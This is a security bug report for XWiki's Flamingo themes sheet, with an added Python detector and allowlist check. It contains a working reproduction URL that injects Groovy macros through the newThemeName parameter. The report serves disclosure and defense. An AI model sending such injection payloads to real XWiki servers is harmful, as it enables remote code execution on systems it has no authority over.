XWiki Platform / XWIKI-19757

Possible wiki injection through translation macro parameters located in FlamingoThemesCode.WebHomeSheet

Details

    • Unit
    • High
    • Unknown
    • N/A
    • N/A

    Description

      To reproduce:

      http://127.0.0.1:8080/xwiki/bin/view/FlamingoThemesCode/WebHomeSheet?newThemeName=foo%22%2F%7D%7D%7B%7Basync%20async%3D%22true%22%20cached%3D%22false%22%20context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22hello%20from%20groovy!%22)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D&form_token=1&action=create

      This actually executes a Groovy macro injected through the URL as part of the error message that was supposed to print the theme name.

      That page contains the following code (executed when passing an invalid form token):

      {{translation key="platform.flamingo.themes.home.create.csrf" parameters="$request.newThemeName" /}}

      This makes it possible to inject any wiki content by providing a value which closes the translation macro and starts anything else.
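      An added example, not XWiki's own code: it models the vulnerable sheet line above in Python, decodes the reproduction URL the way the sheet would see the parameter, and counts the macros the value opens beyond the single translation macro the page intended. The allowlist in is_safe_theme_name is an assumption about what a theme name needs, not XWiki's actual fix.

```python
# Added example (not XWiki code): models the vulnerable sheet line and flags
# request values that escape the translation macro's parameter string.
import re
from urllib.parse import parse_qs, urlsplit

# The line from FlamingoThemesCode.WebHomeSheet quoted in the report.
TEMPLATE = ('{{translation key="platform.flamingo.themes.home.create.csrf" '
            'parameters="$request.newThemeName" /}}')

# Heuristic for XWiki 2.x macro markers: {{name ...}} opens, {{/name}} closes.
# A detection aid, not XWiki's parser (it ignores ~ escapes, for instance).
MACRO_MARKER = re.compile(r'\{\{(/?)([A-Za-z][\w-]*)')

# The reproduction URL from the report.
REPORT_URL = ('http://127.0.0.1:8080/xwiki/bin/view/FlamingoThemesCode/WebHomeSheet'
              '?newThemeName=foo%22%2F%7D%7D%7B%7Basync%20async%3D%22true%22%20cached'
              '%3D%22false%22%20context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7D'
              'println(%22hello%20from%20groovy!%22)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync'
              '%7D%7D&form_token=1&action=create')

def theme_name_from_url(url: str) -> str:
    """Decoded newThemeName query parameter, as the sheet would see it ('' if absent)."""
    return parse_qs(urlsplit(url).query).get('newThemeName', [''])[0]

def render_naive(value: str) -> str:
    """Model the vulnerable sheet: the raw request value is spliced into the macro call."""
    return TEMPLATE.replace('$request.newThemeName', value)

def opened_macros(wiki_text: str) -> list:
    """Names of the macros opened in a piece of wiki syntax, in order of appearance."""
    return [name for closing, name in MACRO_MARKER.findall(wiki_text) if not closing]

def injected_macros(value: str) -> list:
    """Macros the value adds beyond the single {{translation}} the page intended."""
    return opened_macros(render_naive(value))[1:]

def is_safe_theme_name(value: str) -> bool:
    """Conservative allowlist (an assumption, not XWiki's fix): a theme name never
    needs quotes or braces, so reject anything that could end the parameter string."""
    return re.fullmatch(r'[\w .-]{1,100}', value) is not None

if __name__ == '__main__':
    value = theme_name_from_url(REPORT_URL)
    print('decoded value :', value)
    print('injected      :', injected_macros(value))    # ['async', 'groovy']
    print('allowlisted?  :', is_safe_theme_name(value))  # False
```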

            People

              mleduc Manuel Leduc
              tmortagne Thomas Mortagne